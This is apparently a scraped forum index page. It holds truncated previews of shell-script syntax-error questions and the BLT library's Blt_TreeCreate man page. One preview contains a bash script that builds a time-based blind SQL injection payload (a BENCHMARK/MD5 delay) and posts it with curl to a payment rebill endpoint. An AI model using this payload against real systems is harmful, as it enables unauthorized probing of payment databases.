Hi all,
Here is a simple script that is working in one server and is giving a syntax error in other server. Can somebody help me ?
#!/bin/bash
# ftp files
done < $file
errors:
I tried..with no success:
if ; then (21 Replies)
Hi,
I am running the following script through cygwin and getting below mentioned error.
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#!/bin/sh
# constants
WORK_DIR="deploy"
INFOFILE="deploy.info"
INTROFILE="Intro.sh"
CMGMT_PKG="com.kintana.cmgmt.deploy"
DEPLOY_PREFIX="mitg"
... (2 Replies)
What do I do here?
#!/bin/bash
payload=-1 AND 1=IF(21,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#
hash=`echo -n $payload md5sum tr -d 'n' sed 'ss-sg' md5sum tr -d 'n' sed 'ss-sg'`
curl --data cs2=chronopay&cs1=$payload&cs3=$hash&transaction_type=rebill... (2 Replies)
I tried to execute the code but I got this error
./Array.c: line 9: syntax error near unexpected token '('
./Array.c: line 9: ' nvals = get_data(a,MAXARRAY);'
and
#include<stdio.h>
#define MAXARRAY 1000
main()
{
int a,
nvals;
nvals =... (7 Replies)
Hi All;
I try to write a bash code and I am using command substitution. My code is like:
#!/bin/bash
IP="10.0.0.1 10.0.0.2"
PORT="22 80"
USERNAME="admin"
SCRIPT_HOST="adminHost"
HOME_DIR=/home/admin
SCRIPT_DIR=$HOME_DIR/scripts
script="sudo /my_remote_script.sh"
SSH="/usr/bin/ssh... (7 Replies)
Hi all,
I have a simple script that doesn't work somehow. I can't seem to be spotting the cause of the malfunction.
count=$((1))
for item in `cat test1.txt`
printf %s `sed -n $((count))p test2.txt` > test3.txt
count=$((count+1))
do
something
done
I get ;
./why.sh: line 3:... (14 Replies)
Hello every one!!
I don't know where I am going wrong but I am finding it difficult to clear this error of syntax error near unexpected token `else'
I am writing a simple shell script to find a file in a directory and if found execute that else return an error to the log file
... (14 Replies)
I have 2 files like a.txt and b.txt and the content is as below
cat a.txt
810750125 117780 /BSCSQAT4A/bscsqat4a/lib/jar/wclt_common.jar
1803152428 13300 /BSCSQAT4A/bscsqat4a/lib/jar/WFMSSupportTool.jar
2663502779 67049 /BSCSQAT4A/bscsqat4a/lib/jar/wma.jar
687942896 665272... (1 Reply)
Dears,
While executing the below script im getting the error at line 30. Please let me know what changes to be done to fix this.
test.sh: line 30: syntax error near unexpected token `done'
test.sh: line 30: ` done '
#!/bin/sh
# Rev. PA1
# author: eillops
# date: 26-04-2018
#
#... (1 Reply)
detect_mouse_mvt.sh
/home/andy/bin/detect_mouse_mvt.sh: line 4: syntax error near unexpected token `('
/home/andy/bin/detect_mouse_mvt.sh: line 4: `fh = file('/dev/input/mice')'
#!/bin/bash
#
#
fh = file('/dev/input/mice')
while True:
fh.read(3)
print 'Mouse... (15 Replies)
Discussion started by: drew77
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blt_treecreate
Blt_TreeCreate(3) BLT Library Procedures Blt_TreeCreate(3)__________________________________________________________________________________________________________________________________________________NAME
Blt_TreeCreate - Create tree data object.
SYNOPSIS
#include <bltTree.h>
int
Blt_TreeCreate(interp, name, tokenPtr)
ARGUMENTS
Tcl_Interp *interp (in) Interpreter to report results back to.
const char *name (in) Name of the new tree. Can be qualified by a namespace.
Blt_Tree *tokenPtr (out) If not NULL, points to location to store the client tree token.
_________________________________________________________________DESCRIPTION
This procedure creates a C-based tree data object and optionally returns a token to it. The arguments are as follows:
interp Interpreter to report results back to. If an error occurs, then interp->result will contain an error message.
name Name of the new tree object. You can think of name as the memory address of the object. It's a unique name that identifies the
tree object. No tree object name can already exist. Name can be qualified by a namespace such as fred::myTree. If no namespace
qualifier is used, the tree will be created in the current namespace, not the global namespace. If a qualifier is present, the
namespace must already exist.
tokenPtr Holds the returned token. TokenPtr points to a location where it is stored. Tree tokens are used to work with the tree object.
If NULL, no token is allocated. You can later use Tcl_TreeGetToken to obtain a token.
The new tree data object created will initially contain only a root node. You can add new nodes with Blt_TreeCreateNode.
Optionally a token for the tree data object is returned. Tree data objects can be shared. For example, the tree and hiertable commands
may be accessing the same tree data object. Each client grabs a token that is associated with the tree. When all tokens are released (see
Blt_TreeReleaseToken) the tree data object is automatically destroyed.
RETURNS
A standard Tcl result is returned. If TCL_ERROR is returned, then interp->result will contain an error message. The following errors may
occur:
o There already exists a tree by the same name as name. You can use Tcl_TreeExists to determine if a tree exists beforehand.
o The tree name is prefixed by a namespace that doesn't exist. If you qualified the tree name with a namespace, the namespace must exist.
Unlike Tcl procs and variables, the namespace is not automatically created for you.
o Memory can't be allocated for the tree or token.
EXAMPLE
The following example creates a new
Blt_Tree token;
if (Blt_TreeCreate(interp, "myTree", &token) != TCL_OK) {
return TCL_ERROR;
}
printf("tree is %s
", Blt_TreeName(token));
KEYWORDS
Tcl_TreeGetToken, Tcl_TreeExists, Tcl_TreeReleaseToken
BLT 2.4 Blt_TreeCreate(3)